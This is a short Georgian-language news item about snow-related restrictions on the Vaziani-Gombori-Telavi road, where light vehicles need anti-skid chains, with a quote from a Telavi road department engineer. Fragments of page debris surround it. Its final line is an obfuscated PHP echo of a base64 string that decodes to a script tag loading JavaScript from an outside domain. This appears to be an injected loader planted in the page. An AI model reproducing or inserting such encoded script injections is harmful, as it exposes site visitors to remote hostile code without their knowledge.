celsiusi
ავერსი საქკაბელი
ინტენსიური თოვის შედეგად ვაზიანი-გომბორი-თელავის დამაკავშირებელ საავტომობილო გზაზე მსუბუქი ავტომობილების გადაადგილებაზე შეზღუდვები დაწესდა.
როგორც საქართველოს პირველ არხს შპს „თელავის საგზაო სამმართველოში“ განუცხადეს, მსუბუქი ავტომობილებისთვის გადაადგილება მხოლოდ მოცურების საწინააღმდეგო ჯაჭვების გამოყენებით არის დაშვებული. მათივე ცნობით, სხვა სახის ავტოტრანსპორტის მოძრაობა თავისუფალია.
„შუამთის მონასტერთან ტრანსპორტის გადაადგილებას საპატრულო პოლიცია არეგულირებს. ინტენსიურად იწმინდება გზა და იყრება ტექნიკური მარილი“, – განაცხადა თელავის საგზაო სამმართველოს ინჟინერმა, თამაზ აბდულაშვილმა.
გომბორის უღელტეხილზე ახლაც ინტენსიურად თოვს და ნისლია.
335
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");